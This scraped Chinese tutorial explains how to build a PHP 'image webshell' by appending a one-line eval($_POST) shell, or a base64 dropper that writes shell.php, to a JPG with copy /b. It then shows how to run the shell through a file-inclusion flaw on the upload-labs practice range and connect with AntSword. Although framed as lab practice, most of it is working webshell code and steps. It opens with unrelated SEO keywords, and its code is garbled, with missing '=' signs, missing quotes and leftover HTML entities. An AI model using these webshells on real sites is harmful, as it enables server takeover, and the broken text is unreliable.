聚美优品一个专注于做特价的网站,外网如何查看局域网建设的网站,做毕业设计一个网站的数据来源,镇江特色图片马介绍
图片马#xff1a;就是在正常图片中插入木马。
图片马的制作
1.我们先创建php木马文件1.php#xff0c;内容有以下两种方式#xff1a;
?php eval($_POST[a]); ?
/* 常规一句话木马 */
?php
$aPD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8;
$myfile…图片马介绍
图片马就是在正常图片中插入木马。
图片马的制作
1.我们先创建php木马文件1.php内容有以下两种方式
?php eval($_POST[a]); ?
/* 常规一句话木马 */
?php
$aPD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8;
$myfile fopen(shell.php, w);
fwrite($myfile, base64_decode($a));
fclose($myfile);
?
/* 这是在当前目录下写入一个一句话木马文件base64编码可用于一些绕过 */
2.随便找到一张图片jpg、png、gif格式不限此处以1.jpg为例
把该图片与上面创建的一句话木马放在一个目录下
3.cmd到这个目录下
输出指令copy /b 1.php1.jpg 2.jpg
意为以二进制的形式(/b)把1.php文件追加到1.jpg文件末尾组成新的文件2.jpg
图片马的使用
网站上存在文件上传漏洞时我们上传图片马直接访问该图片马是不会奏效的因为服务器并没与对该图片马进行php代码执行此时我们就要使图片马与文件包含漏洞联动我们本地创建一个用于文件包含的include.php文件放于phpstudy搭建的网站下内容如下
?php
/*
本页面存在文件包含漏洞用于测试图片马是否能正常运行
*/
header(Content-Type:text/html;charsetutf-8);
$file $_GET[file];
if(isset($file)){include $file;
}else{show_source(__file__);
}
?然后我们本地访问该文件并传入参数
此处我以upload靶场的15关为例
此处我就把该include.php文件放入靶场上传目录upload下 我们成功上传图片马后先访问include.php然后文件包含图片马其地址就是url中file等于的地址。 我使用写入一句话木马的木马代码当我成功包含该图片马后目录就会生成一句话木马文件如下 然后我们蚁剑连接即可
